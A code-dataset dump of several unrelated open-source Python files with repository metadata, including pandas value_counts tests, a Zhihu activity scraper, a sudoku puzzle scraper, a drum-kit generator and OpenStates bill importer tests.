errorlog = errors.ErrorLog()
unit = infer.infer_types(src, self.PYTHON_VERSION, errorlog, **kwargs)
unit = pytd_utils.CanonicalOrdering(unit.Visit(visitors.VerifyVisitor()))
if report_errors and errorlog:
errorlog.print_to_stderr()
self.fail("Inferencer found %d errors" % len(errorlog))
return unit
def assertTypesMatchPytd(self, ty, pytd_src, version=None):
"""Parses pytd_src and compares with ty."""
# TODO(pludemann): This is a copy of pytd.parse.parser_test.Parse()
# TODO(pludemann): Consider using the pytd_tree to call
# assertHasOnlySignatures (or similar) to guard against the
# inferencer adding additional but harmless calls.
pytd_tree = parser.TypeDeclParser(version=version).Parse(
textwrap.dedent(pytd_src))
pytd_tree = pytd_tree.Visit(
visitors.ClassTypeToNamedType())
pytd_tree = pytd_tree.Visit(
visitors.CanonicalOrderingVisitor(sort_signatures=True))
pytd_tree.Visit(visitors.VerifyVisitor())
ty = ty.Visit(visitors.ClassTypeToNamedType())
ty = ty.Visit(visitors.AdjustSelf(force=True))
ty = ty.Visit(visitors.CanonicalOrderingVisitor(sort_signatures=True))
ty.Visit(visitors.VerifyVisitor())
ty_src = pytd.Print(ty) + "\n"
pytd_tree_src = pytd.Print(pytd_tree) + "\n"
log.info("====== ty ===")
_LogLines(log.info, ty_src)
log.info("=== TypeMatchPytd ===")
_LogLines(log.info, pytd_tree_src)
log.info("====== ====== ======")
# In the diff output, mark expected with "-" and actual with "+".
# (In other words, display a change from "working" to "broken")
self.assertMultiLineEqual(pytd_tree_src, ty_src)
def make_code(self, byte_array, name="testcode"):
"""Utility method for creating CodeType objects."""
return loadmarshal.CodeType(
argcount=0, kwonlyargcount=0, nlocals=2, stacksize=2, flags=0,
consts=[None, 1, 2], names=[], varnames=["x", "y"], filename="",
name=name, firstlineno=1, lnotab=[], freevars=[], cellvars=[],
code="".join(chr(c) for c in byte_array),
python_version=self.PYTHON_VERSION)
def _PrintErrorDebug(descr, value):
log.error("=============== %s ===========", descr)
_LogLines(log.error, value)
log.error("=========== end %s ===========", descr)
def _LogLines(log_cmd, lines):
for l in lines.split("\n"):
log_cmd("%s", l)
def main(debugging=False):
# TODO(ampere): This is just a useful hack. Should be replaced with real
# argument handling.
if debugging or len(sys.argv) > 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
unittest.main()
if __name__ == "__main__":
main()
| 43.15565 | 80 | 0.655682 |
8c0d6a377ec6fa60638528d8ecdd8c638b5410f3
| 2,223 |
py
|
Python
|
src/gen_drum_kit/main.py
|
peter-zenk/genDrumkit
|
a74bae332443db6424be46ebd32b8fffeac14ce1
|
[
"MIT"
] | 7 |
2020-06-25T15:36:17.000Z
|
2022-01-09T21:43:27.000Z
|
src/gen_drum_kit/main.py
|
peter-zenk/genDrumkit
|
a74bae332443db6424be46ebd32b8fffeac14ce1
|
[
"MIT"
] | 3 |
2022-01-09T20:44:52.000Z
|
2022-02-02T10:43:23.000Z
|
src/gen_drum_kit/main.py
|
peter-zenk/genDrumkit
|
a74bae332443db6424be46ebd32b8fffeac14ce1
|
[
"MIT"
] | 1 |
2020-08-16T18:17:26.000Z
|
2020-08-16T18:17:26.000Z
|
'''
Created on Jun 14, 2020
@author: peter
'''
import sys
import logging
from shutil import rmtree
from platform import system
from gen_drum_kit.parameter import Parameter
from gen_drum_kit.factory import ImporterFactory, ExporterFactory
logger = logging.getLogger(__name__)
class Main():
""" The top level class handling the program flow """
def __init__(self):
self._impFactory = ImporterFactory()
self._expFactory = ExporterFactory()
self._params = None # defined later
@staticmethod
def _check_environment():
if sys.hexversion < 50856688:
#check python version
print("INFO: Your version of python is " + str(sys.version_info))
sys.exit("ERROR: You must use at least python 3.8.2. Aborting ...")
if system() != "Linux":
# only Linux will be supported
print("INFO: You are running on :", system())
sys.exit("ERROR: You must run on a 'Linux' system!")
def _init_program(self):
# initialize the program context
self._check_environment()
self._params = Parameter()
def _cleanup(self):
# cleaning up on exit
logger.info("Cleaning up ...")
for item in self._params.clean_rm:
logger.debug("Removing '%s' ...", item)
try:
rmtree(item)
except:
logger.error("Could not remove '%s'!", item)
def run(self):
""" this is the main run() task to be called by the client script """
# command line, default settings, initial sanity checks
self._init_program()
logger.debug("Running in debug mode")
# create the importer and import data
Imp = self._impFactory.create(self._params)
Imp.importData()
# build the drum kit object based on the data read by the importer
Drumkit = Imp.buildDrumkitDB()
logger.debug(Drumkit)
# create the exporter and export the output drum kit with the data
# from the drum kit object
Exp = self._expFactory.create(Drumkit, self._params)
Exp.export()
self._cleanup()
logger.info("Finished program ...")
| 28.139241 | 79 | 0.615385 |
2514b11613ef6f87bf96bb9c3c0957d9d7b13f98
| 9,066 |
py
|
Python
|
pandas/tests/base/test_value_counts.py
|
monferrand/pandas
|
a3477c769b3d2ea4950ae69f8867e3b291b743c1
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2020-06-04T21:46:19.000Z
|
2020-06-04T21:46:19.000Z
|
pandas/tests/base/test_value_counts.py
|
monferrand/pandas
|
a3477c769b3d2ea4950ae69f8867e3b291b743c1
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/base/test_value_counts.py
|
monferrand/pandas
|
a3477c769b3d2ea4950ae69f8867e3b291b743c1
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
import collections
from datetime import timedelta
from io import StringIO
import numpy as np
import pytest
from pandas._libs.tslib import iNaT
from pandas.compat.numpy import np_array_datetime64_compat
from pandas.core.dtypes.common import needs_i8_conversion
import pandas as pd
from pandas import (
DatetimeIndex,
Index,
Interval,
IntervalIndex,
Series,
Timedelta,
TimedeltaIndex,
)
import pandas._testing as tm
from pandas.tests.base.common import allow_na_ops
def test_value_counts(index_or_series_obj):
obj = index_or_series_obj
obj = np.repeat(obj, range(1, len(obj) + 1))
result = obj.value_counts()
counter = collections.Counter(obj)
expected = pd.Series(dict(counter.most_common()), dtype=np.int64, name=obj.name)
expected.index = expected.index.astype(obj.dtype)
if isinstance(obj, pd.MultiIndex):
expected.index = pd.Index(expected.index)
# TODO: Order of entries with the same count is inconsistent on CI (gh-32449)
if obj.duplicated().any():
result = result.sort_index()
expected = expected.sort_index()
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("null_obj", [np.nan, None])
def test_value_counts_null(null_obj, index_or_series_obj):
orig = index_or_series_obj
obj = orig.copy()
if not allow_na_ops(obj):
pytest.skip("type doesn't allow for NA operations")
elif len(obj) < 1:
pytest.skip("Test doesn't make sense on empty data")
elif isinstance(orig, pd.MultiIndex):
pytest.skip(f"MultiIndex can't hold '{null_obj}'")
values = obj.values
if needs_i8_conversion(obj.dtype):
values[0:2] = iNaT
else:
values[0:2] = null_obj
klass = type(obj)
repeated_values = np.repeat(values, range(1, len(values) + 1))
obj = klass(repeated_values, dtype=obj.dtype)
# because np.nan == np.nan is False, but None == None is True
# np.nan would be duplicated, whereas None wouldn't
counter = collections.Counter(obj.dropna())
expected = pd.Series(dict(counter.most_common()), dtype=np.int64)
expected.index = expected.index.astype(obj.dtype)
result = obj.value_counts()
if obj.duplicated().any():
# TODO:
# Order of entries with the same count is inconsistent on CI (gh-32449)
expected = expected.sort_index()
result = result.sort_index()
tm.assert_series_equal(result, expected)
# can't use expected[null_obj] = 3 as
# IntervalIndex doesn't allow assignment
new_entry = pd.Series({np.nan: 3}, dtype=np.int64)
expected = expected.append(new_entry)
result = obj.value_counts(dropna=False)
if obj.duplicated().any():
# TODO:
# Order of entries with the same count is inconsistent on CI (gh-32449)
expected = expected.sort_index()
result = result.sort_index()
tm.assert_series_equal(result, expected)
def test_value_counts_inferred(index_or_series):
klass = index_or_series
s_values = ["a", "b", "b", "b", "b", "c", "d", "d", "a", "a"]
s = klass(s_values)
expected = Series([4, 3, 2, 1], index=["b", "a", "d", "c"])
tm.assert_series_equal(s.value_counts(), expected)
if isinstance(s, Index):
exp = Index(np.unique(np.array(s_values, dtype=np.object_)))
tm.assert_index_equal(s.unique(), exp)
else:
exp = np.unique(np.array(s_values, dtype=np.object_))
tm.assert_numpy_array_equal(s.unique(), exp)
assert s.nunique() == 4
# don't sort, have to sort after the fact as not sorting is
# platform-dep
hist = s.value_counts(sort=False).sort_values()
expected = Series([3, 1, 4, 2], index=list("acbd")).sort_values()
tm.assert_series_equal(hist, expected)
# sort ascending
hist = s.value_counts(ascending=True)
expected = Series([1, 2, 3, 4], index=list("cdab"))
tm.assert_series_equal(hist, expected)
# relative histogram.
hist = s.value_counts(normalize=True)
expected = Series([0.4, 0.3, 0.2, 0.1], index=["b", "a", "d", "c"])
tm.assert_series_equal(hist, expected)
def test_value_counts_bins(index_or_series):
klass = index_or_series
s_values = ["a", "b", "b", "b", "b", "c", "d", "d", "a", "a"]
s = klass(s_values)
# bins
msg = "bins argument only works with numeric data"
with pytest.raises(TypeError, match=msg):
s.value_counts(bins=1)
s1 = Series([1, 1, 2, 3])
res1 = s1.value_counts(bins=1)
exp1 = Series({Interval(0.997, 3.0): 4})
tm.assert_series_equal(res1, exp1)
res1n = s1.value_counts(bins=1, normalize=True)
exp1n = Series({Interval(0.997, 3.0): 1.0})
tm.assert_series_equal(res1n, exp1n)
if isinstance(s1, Index):
tm.assert_index_equal(s1.unique(), Index([1, 2, 3]))
else:
exp = np.array([1, 2, 3], dtype=np.int64)
tm.assert_numpy_array_equal(s1.unique(), exp)
assert s1.nunique() == 3
# these return the same
res4 = s1.value_counts(bins=4, dropna=True)
intervals = IntervalIndex.from_breaks([0.997, 1.5, 2.0, 2.5, 3.0])
exp4 = Series([2, 1, 1, 0], index=intervals.take([0, 3, 1, 2]))
tm.assert_series_equal(res4, exp4)
res4 = s1.value_counts(bins=4, dropna=False)
intervals = IntervalIndex.from_breaks([0.997, 1.5, 2.0, 2.5, 3.0])
exp4 = Series([2, 1, 1, 0], index=intervals.take([0, 3, 1, 2]))
tm.assert_series_equal(res4, exp4)
res4n = s1.value_counts(bins=4, normalize=True)
exp4n = Series([0.5, 0.25, 0.25, 0], index=intervals.take([0, 3, 1, 2]))
tm.assert_series_equal(res4n, exp4n)
# handle NA's properly
s_values = ["a", "b", "b", "b", np.nan, np.nan, "d", "d", "a", "a", "b"]
s = klass(s_values)
expected = Series([4, 3, 2], index=["b", "a", "d"])
tm.assert_series_equal(s.value_counts(), expected)
if isinstance(s, Index):
exp = Index(["a", "b", np.nan, "d"])
tm.assert_index_equal(s.unique(), exp)
else:
exp = np.array(["a", "b", np.nan, "d"], dtype=object)
tm.assert_numpy_array_equal(s.unique(), exp)
assert s.nunique() == 3
s = klass({}) if klass is dict else klass({}, dtype=object)
expected = Series([], dtype=np.int64)
tm.assert_series_equal(s.value_counts(), expected, check_index_type=False)
# returned dtype differs depending on original
if isinstance(s, Index):
tm.assert_index_equal(s.unique(), Index([]), exact=False)
else:
tm.assert_numpy_array_equal(s.unique(), np.array([]), check_dtype=False)
assert s.nunique() == 0
def test_value_counts_datetime64(index_or_series):
klass = index_or_series
# GH 3002, datetime64[ns]
# don't test names though
txt = "\n".join(
[
"xxyyzz20100101PIE",
"xxyyzz20100101GUM",
"xxyyzz20100101EGG",
"xxyyww20090101EGG",
"foofoo20080909PIE",
"foofoo20080909GUM",
]
)
f = StringIO(txt)
df = pd.read_fwf(
f, widths=[6, 8, 3], names=["person_id", "dt", "food"], parse_dates=["dt"]
)
s = klass(df["dt"].copy())
s.name = None
idx = pd.to_datetime(
["2010-01-01 00:00:00", "2008-09-09 00:00:00", "2009-01-01 00:00:00"]
)
expected_s = Series([3, 2, 1], index=idx)
tm.assert_series_equal(s.value_counts(), expected_s)
expected = np_array_datetime64_compat(
["2010-01-01 00:00:00", "2009-01-01 00:00:00", "2008-09-09 00:00:00"],
dtype="datetime64[ns]",
)
if isinstance(s, Index):
tm.assert_index_equal(s.unique(), DatetimeIndex(expected))
else:
tm.assert_numpy_array_equal(s.unique(), expected)
assert s.nunique() == 3
# with NaT
s = df["dt"].copy()
s = klass(list(s.values) + [pd.NaT])
result = s.value_counts()
assert result.index.dtype == "datetime64[ns]"
tm.assert_series_equal(result, expected_s)
result = s.value_counts(dropna=False)
expected_s[pd.NaT] = 1
tm.assert_series_equal(result, expected_s)
unique = s.unique()
assert unique.dtype == "datetime64[ns]"
# numpy_array_equal cannot compare pd.NaT
if isinstance(s, Index):
exp_idx = DatetimeIndex(expected.tolist() + [pd.NaT])
tm.assert_index_equal(unique, exp_idx)
else:
tm.assert_numpy_array_equal(unique[:3], expected)
assert pd.isna(unique[3])
assert s.nunique() == 3
assert s.nunique(dropna=False) == 4
# timedelta64[ns]
td = df.dt - df.dt + timedelta(1)
td = klass(td, name="dt")
result = td.value_counts()
expected_s = Series([6], index=[Timedelta("1day")], name="dt")
tm.assert_series_equal(result, expected_s)
expected = TimedeltaIndex(["1 days"], name="dt")
if isinstance(td, Index):
tm.assert_index_equal(td.unique(), expected)
else:
tm.assert_numpy_array_equal(td.unique(), expected.values)
td2 = timedelta(1) + (df.dt - df.dt)
td2 = klass(td2, name="dt")
result2 = td2.value_counts()
tm.assert_series_equal(result2, expected_s)
| 32.729242 | 84 | 0.637326 |
54ced15b7ea1cd138adc9c261eff66978dc4891f
| 337 |
py
|
Python
|
test_project/main/urls.py
|
CloudRunnerInc/django-admin-smoke-tests
|
8f83ce0f6f8947575040befbb8763de195c7d506
|
[
"BSD-3-Clause"
] | 13 |
2015-01-12T09:32:38.000Z
|
2021-11-18T06:38:42.000Z
|
test_project/main/urls.py
|
CloudRunnerInc/django-admin-smoke-tests
|
8f83ce0f6f8947575040befbb8763de195c7d506
|
[
"BSD-3-Clause"
] | 18 |
2015-06-12T18:07:55.000Z
|
2020-09-05T09:29:45.000Z
|
test_project/main/urls.py
|
CloudRunnerInc/django-admin-smoke-tests
|
8f83ce0f6f8947575040befbb8763de195c7d506
|
[
"BSD-3-Clause"
] | 9 |
2015-06-15T16:40:52.000Z
|
2020-06-16T01:07:28.000Z
|
from django.conf.urls import url
urlpatterns = [
url(r'^posts/(?P<pk>.+)/$', lambda **kwargs: '', name="post-detail"),
url(r'^hasprimaryslug/(?P<pk>[\w-]+)/$', lambda **kwargs: '',
name="hasprimaryslug-detail"),
url(r'^hasprimaryuuid/(?P<pk>[\w-]+)/$', lambda **kwargs: '',
name="hasprimaryuuid-detail"),
]
| 30.636364 | 73 | 0.569733 |
0ef0211db90dc033de056523d5abaf4d80827327
| 225 |
py
|
Python
|
tests/parser/wellfounded.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
t(Z) :- t0(Z).
t(Z) :- g(X,Y,Z), t(X), not t(Y).
t0(2).
g(5,1,3).
g(1,2,4).
g(3,4,5).
"""
output = """
t(Z) :- t0(Z).
t(Z) :- g(X,Y,Z), t(X), not t(Y).
t0(2).
g(5,1,3).
g(1,2,4).
g(3,4,5).
"""
| 10.714286 | 34 | 0.342222 |
1fed3a8fb5f00cbed51ba9fbbffb1a44c47b986a
| 7,145 |
py
|
Python
|
zhihu/activity.py
|
xiaoxing1120/zhihu-spider
|
6ab2a0391523d04bd5d537560bb4836a16b3de47
|
[
"MIT"
] | 1 |
2016-10-10T12:28:08.000Z
|
2016-10-10T12:28:08.000Z
|
zhihu/activity.py
|
evsward/zhihu-py3
|
6ab2a0391523d04bd5d537560bb4836a16b3de47
|
[
"MIT"
] | null | null | null |
zhihu/activity.py
|
evsward/zhihu-py3
|
6ab2a0391523d04bd5d537560bb4836a16b3de47
|
[
"MIT"
] | 1 |
2016-09-15T09:01:16.000Z
|
2016-09-15T09:01:16.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime
from .common import *
from .acttype import ActType
from .question import Question
from .answer import Answer
from .column import Column
from .post import Post
from .topic import Topic
from .author import Author, ANONYMOUS
from .collection import Collection
class Activity:
"""用户动态类,请使用Author.activities获取."""
def __init__(self, act, session, author):
"""创建用户动态类实例.
:param bs4.element.Tag act: 表示用户动态的页面元素
:param Session session: 使用的网络会话
:param Author author: Activity 所属的用户对象
:return: 用户动态对象
:rtype: Activity
:说明:
根据Activity.type不同可以获取不同属性,具体请看 :class:`.ActType`
"""
self._session = session
self._author = author
self._type = ActType.from_str(act.attrs['data-type-detail'])
useless_tag = act.div.find('a', class_='zg-link')
if useless_tag is not None:
useless_tag.extract()
attribute = self._get_assemble_method(self.type)(act)
self._attr = attribute.__class__.__name__.lower()
setattr(self, self._attr, attribute)
self._time = datetime.fromtimestamp(int(act['data-time']))
@property
def type(self):
"""
:return: 用户动态类型, 具体参见 :class:`.ActType`
:rtype: class:`.ActType`
"""
return self._type
@property
def content(self):
"""获取此对象中能提供的那个属性,对应表请查看 :class:`.ActType` 类.
:return: 对象提供的对象
:rtype: Author or Question or Answer or Topic or Column or Post
"""
return getattr(self, self._attr)
@property
def time(self):
"""
:return: 返回用户执行 Activity 操作的时间
:rtype: datetime.datetime
"""
return self._time
def __find_post(self, act):
try:
column_url = act.find('a', class_='column_link')['href']
column_name = act.find('a', class_='column_link').text
column = Column(column_url, column_name, session=self._session)
except TypeError:
column = None
try:
author_tag = act.find('div', class_='author-info')
author_url = Zhihu_URL + author_tag.a['href']
author_name = author_tag.a.text
author_motto = author_tag.span.text if author_tag.span else ''
author = Author(author_url, author_name, author_motto,
session=self._session)
except TypeError:
author = ANONYMOUS
post_url = act.find('a', class_='post-link')['href']
post_title = act.find('a', class_='post-link').text
post_comment_num, post_upvote_num = self._parse_un_cn(act)
return Post(post_url, column, author, post_title,
post_upvote_num, post_comment_num,
session=self._session)
def _assemble_create_post(self, act):
return self.__find_post(act)
def _assemble_voteup_post(self, act):
return self.__find_post(act)
def _assemble_follow_column(self, act):
return Column(act.div.a['href'], act.div.a.text, session=self._session)
def _assemble_follow_topic(self, act):
topic_url = Zhihu_URL + act.div.a['href']
topic_name = act.div.a['title']
return Topic(topic_url, topic_name, session=self._session)
def _assemble_answer_question(self, act):
question_url = Zhihu_URL + re_a2q.match(act.div.find_all('a')[-1]['href']).group(1)
question_title = act.div.find_all('a')[-1].text
question = Question(question_url, question_title, session=self._session)
answer_url = Zhihu_URL + act.div.find_all('a')[-1]['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, self._author, answer_upvote_num, session=self._session)
def _assemble_voteup_answer(self, act):
question_url = Zhihu_URL + re_a2q.match(act.div.a['href']).group(1)
question_title = act.div.a.text
question = Question(question_url, question_title, session=self._session)
try_find_author = act.find_all('a', class_='author-link', href=re.compile('^/people/[^/]*$'))
if len(try_find_author) == 0:
author_url = None
author_name = '匿名用户'
author_motto = ''
photo_url = None
else:
try_find_author = try_find_author[-1]
author_url = Zhihu_URL + try_find_author['href']
author_name = try_find_author.text
try_find_motto = try_find_author.parent.span
if try_find_motto is None:
author_motto = ''
else:
author_motto = try_find_motto['title']
photo_url = PROTOCOL + try_find_author.parent.a.img[
'src'].replace('_s', '_r')
author = Author(author_url, author_name, author_motto,
photo_url=photo_url, session=self._session)
answer_url = Zhihu_URL + act.div.a['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, author, answer_upvote_num, session=self._session)
def _assemble_ask_question(self, act):
return Question(Zhihu_URL + act.div.contents[3]['href'],
list(act.div.children)[3].text,
session=self._session)
def _assemble_follow_question(self, act):
return Question(Zhihu_URL + act.div.a['href'], act.div.a.text, session=self._session)
def _assemble_follow_collection(self, act):
url = act.div.a['href']
if not url.startswith('http'):
url = Zhihu_URL + url
return Collection(url, session=self._session)
def _get_assemble_method(self, act_type):
assemble_methods = {
ActType.UPVOTE_POST: self._assemble_voteup_post,
ActType.FOLLOW_COLUMN: self._assemble_follow_column,
ActType.UPVOTE_ANSWER: self._assemble_voteup_answer,
ActType.ANSWER_QUESTION: self._assemble_answer_question,
ActType.ASK_QUESTION: self._assemble_ask_question,
ActType.FOLLOW_QUESTION: self._assemble_follow_question,
ActType.FOLLOW_TOPIC: self._assemble_follow_topic,
ActType.PUBLISH_POST: self._assemble_create_post,
ActType.FOLLOW_COLLECTION: self._assemble_follow_collection
}
if act_type in assemble_methods:
return assemble_methods[act_type]
else:
raise ValueError('invalid activity type')
@staticmethod
def _parse_un_cn(act):
upvote_num = act.find('a', class_='zm-item-vote-count').text
if upvote_num.isdigit():
upvote_num = int(upvote_num)
else:
upvote_num = None
comment = act.find('a', class_='toggle-comment')
comment_text = next(comment.stripped_strings)
comment_num_match = re_get_number.match(comment_text)
comment_num = int(comment_num_match.group(1)) if comment_num_match is not None else 0
return comment_num, upvote_num
| 37.804233 | 101 | 0.630931 |
5dd08ae61bb79be9a062edf8089b922ef67c3224
| 2,058 |
py
|
Python
|
sudoku_scraper_bs.py
|
isaacwen/sudoku
|
10a625033aa115f07c4a638736b357539bb2bf86
|
[
"MIT"
] | null | null | null |
sudoku_scraper_bs.py
|
isaacwen/sudoku
|
10a625033aa115f07c4a638736b357539bb2bf86
|
[
"MIT"
] | null | null | null |
sudoku_scraper_bs.py
|
isaacwen/sudoku
|
10a625033aa115f07c4a638736b357539bb2bf86
|
[
"MIT"
] | null | null | null |
# Isaac Wen
# This program gets sudoku puzzles from nine.websudoku.com and stores them
# locally
import urllib.request
from sudoku_backtracking import *
from bs4 import BeautifulSoup
# Produces the HTML for a specified difficulty of sudoku puzzle
def get_html(num):
url = "https://nine.websudoku.com/?level=" + str(num)
data = urllib.request.urlopen(url)
data = data.read()
return str(data)
# Produces the 81 digits representing the solution to a sudoku puzzle and
# the mask from the HTML produces by get_html
def get_sol(str):
soup = BeautifulSoup(str, 'html.parser')
puzzle_html = soup.select("#cheat")
puzzle = puzzle_html[0]['value']
mask_html = soup.select("#editmask")
mask = mask_html[0]['value']
return (puzzle, mask)
# Masks a given sudoku puzzle using a given mask
def mask_sol(sol_mask):
(sol, mask) = sol_mask
actual_puz = ""
for i in range(81):
if mask[i] == "1":
actual_puz = actual_puz + "0"
else:
actual_puz = actual_puz + sol[i]
return actual_puz
# Generates a puzzle and its solution given a difficulty from 1 - 4
def get_puzzle(num):
html = get_html(num)
sol_mask = get_sol(html)
(sol, mask) = sol_mask
puzzle = mask_sol(sol_mask)
return (puzzle, sol)
# Generates puzzles based on the user's difficulty specification
def generate_main():
difficulty = str(input("What difficulty puzzle would you like?\n(Enter"
" a difficulty from 1 to 4, 1 being the "
"easiest): "))
(puz, sol) = get_puzzle(difficulty)
puzzle = SudokuAI(puz)
solution = SudokuAI(sol)
print("The following is a puzzle of difficulty {0}:".format(difficulty))
print(puzzle)
next = input("Press ENTER to view the solution.")
print(solution)
choice = input("Would you like to view another puzzle? (Y to view): ")
if choice == "Y":
generate_main()
else:
return
# generate_main()
| 32.666667 | 77 | 0.635083 |
dba1c0e68d0b8d01198764d41703ab41afda5b2b
| 833 |
py
|
Python
|
aliyun/log/cursor_time_response.py
|
TylerTemp/aliyun-log-sdk-python
|
c2935027df8efc0088e3369c00839fc80f615ef2
|
[
"BSD-3-Clause"
] | null | null | null |
aliyun/log/cursor_time_response.py
|
TylerTemp/aliyun-log-sdk-python
|
c2935027df8efc0088e3369c00839fc80f615ef2
|
[
"BSD-3-Clause"
] | null | null | null |
aliyun/log/cursor_time_response.py
|
TylerTemp/aliyun-log-sdk-python
|
c2935027df8efc0088e3369c00839fc80f615ef2
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
#encoding: utf-8
# Copyright (C) Alibaba Cloud Computing
# All rights reserved.
from aliyun.log.util import Util
from logresponse import LogResponse
class GetCursorTimeResponse(LogResponse) :
""" The response of the get_cursor_time API from log.
:type header: dict
:param header: GetCursorTimeResponse HTTP response header
:type resp: dict
:param resp: the HTTP response body
"""
def __init__(self, resp, header):
LogResponse.__init__(self, header)
self.cursor_time = resp['cursor_time']
def get_cursor_time(self) :
return self.cursor_time
def log_print(self):
print 'GetCursorTimeResponse'
print 'headers:', self.get_all_headers()
print 'cursor_time:', self.cursor_time
| 25.242424 | 62 | 0.656663 |
c015a79711de28bda18df5b58fd732efa7552d38
| 18,087 |
py
|
Python
|
openstates/importers/tests/test_bill_importer.py
|
washabstract/openstates-core
|
ea69564f1f56fe4a80181b0aa715731bbc47e3f5
|
[
"MIT"
] | 9 |
2020-04-04T00:19:07.000Z
|
2022-02-27T02:24:12.000Z
|
openstates/importers/tests/test_bill_importer.py
|
washabstract/openstates-core
|
ea69564f1f56fe4a80181b0aa715731bbc47e3f5
|
[
"MIT"
] | 17 |
2020-03-31T18:19:59.000Z
|
2022-01-03T15:18:48.000Z
|
openstates/importers/tests/test_bill_importer.py
|
washabstract/openstates-core
|
ea69564f1f56fe4a80181b0aa715731bbc47e3f5
|
[
"MIT"
] | 19 |
2020-04-10T21:32:21.000Z
|
2022-03-02T20:23:21.000Z
|
import pytest
from openstates.scrape import Bill as ScrapeBill
from openstates.importers import BillImporter
from openstates.data.models import (
Jurisdiction,
Person,
Organization,
Membership,
Division,
Bill,
)
from openstates.utils.transformers import fix_bill_id
from openstates.utils.generic import _make_pseudo_id
from openstates.exceptions import DuplicateItemError
def create_jurisdiction() -> Jurisdiction:
Division.objects.create(id="ocd-division/country:us", name="USA")
j = Jurisdiction.objects.create(id="jid", division_id="ocd-division/country:us")
j.legislative_sessions.create(
identifier="1899", name="1899", start_date="1899", end_date="1900"
)
j.legislative_sessions.create(
identifier="1900", name="1900", start_date="1900", end_date="1901"
)
return j
def create_org():
return Organization.objects.create(
id="org-id", name="House", classification="lower", jurisdiction_id="jid"
)
@pytest.mark.django_db
def test_full_bill():
create_jurisdiction()
person = Person.objects.create(name="Adam Smith")
lower = Organization.objects.create(
jurisdiction_id="jid", name="House", classification="lower"
)
Membership.objects.create(person_id=person.id, organization_id=lower.id)
Organization.objects.create(
jurisdiction_id="jid",
name="Arbitrary Committee",
classification="committee",
parent=lower,
)
oldbill = ScrapeBill(
"HB 99",
"1899",
"Axe & Tack Tax Act",
classification="tax bill",
chamber="lower",
)
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
bill.subject = ["taxes", "axes"]
bill.add_identifier("SB 9")
bill.add_title("Tack & Axe Tax Act")
bill.add_action("introduced in house", "1900-04-01", chamber="lower")
act = bill.add_action("sent to arbitrary committee", "1900-04-04", chamber="lower")
act.add_related_entity(
"arbitrary committee",
"organization",
_make_pseudo_id(name="Arbitrary Committee"),
)
bill.add_related_bill(
"HB 99", legislative_session="1899", relation_type="prior-session"
)
bill.add_sponsorship(
"Adam Smith",
classification="extra sponsor",
entity_type="person",
primary=False,
entity_id=_make_pseudo_id(name="Adam Smith"),
)
bill.add_sponsorship(
"Jane Smith", classification="lead sponsor", entity_type="person", primary=True
)
bill.add_abstract(
"This is an act about axes and taxes and tacks.",
note="official",
)
bill.add_document_link(
"Fiscal Note", "http://example.com/fn.pdf", media_type="application/pdf"
)
bill.add_document_link(
"Fiscal Note", "http://example.com/fn.html", media_type="text/html"
)
bill.add_version_link(
"Fiscal Note", "http://example.com/v/1", media_type="text/html"
)
bill.add_source("http://example.com/source")
# import bill
BillImporter("jid").import_data([oldbill.as_dict(), bill.as_dict()])
# get bill from db and assert it imported correctly
b = Bill.objects.get(identifier="HB 1")
assert b.from_organization.classification == "lower"
assert b.identifier == bill.identifier
assert b.title == bill.title
assert b.classification == bill.classification
assert b.subject == ["taxes", "axes"]
assert b.abstracts.get().note == "official"
# other_title, other_identifier added
assert b.other_titles.get().title == "Tack & Axe Tax Act"
assert b.other_identifiers.get().identifier == "SB 9"
# actions
actions = list(b.actions.all())
assert len(actions) == 2
# ensure order was preserved (if this breaks it'll be intermittent)
assert actions[0].organization == Organization.objects.get(classification="lower")
assert actions[0].description == "introduced in house"
assert actions[1].description == "sent to arbitrary committee"
assert actions[1].related_entities.get().organization == Organization.objects.get(
classification="committee"
)
# action computed fields
assert b.first_action_date == "1900-04-01"
assert b.latest_action_date == "1900-04-04"
assert b.latest_action_description == "sent to arbitrary committee"
# related_bills were added
rb = b.related_bills.get()
assert rb.identifier == "HB 99"
# and bill got resolved
assert rb.related_bill.identifier == "HB 99"
# sponsors added, linked & unlinked
sponsorships = b.sponsorships.all()
assert len(sponsorships) == 2
person = Person.objects.get(name="Adam Smith")
for ss in sponsorships:
if ss.primary:
assert ss.person is None
assert ss.organization is None
else:
assert ss.person == person
# versions & documents with their links
versions = b.versions.all()
assert len(versions) == 1
assert versions[0].links.count() == 1
documents = b.documents.all()
assert len(documents) == 1
assert documents[0].links.count() == 2
# sources
assert b.sources.count() == 1
@pytest.mark.django_db
def test_bill_chamber_param():
create_jurisdiction()
org = create_org()
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
BillImporter("jid").import_data([bill.as_dict()])
assert Bill.objects.get().from_organization_id == org.id
@pytest.mark.django_db
def test_duplicate_bill_different_chamber():
create_jurisdiction()
create_org()
Organization.objects.create(
id="upper-id", name="Senate", classification="upper", jurisdiction_id="jid"
)
b1 = ScrapeBill("HB 1", "1900", "Axe & Tack Tax Act", chamber="lower")
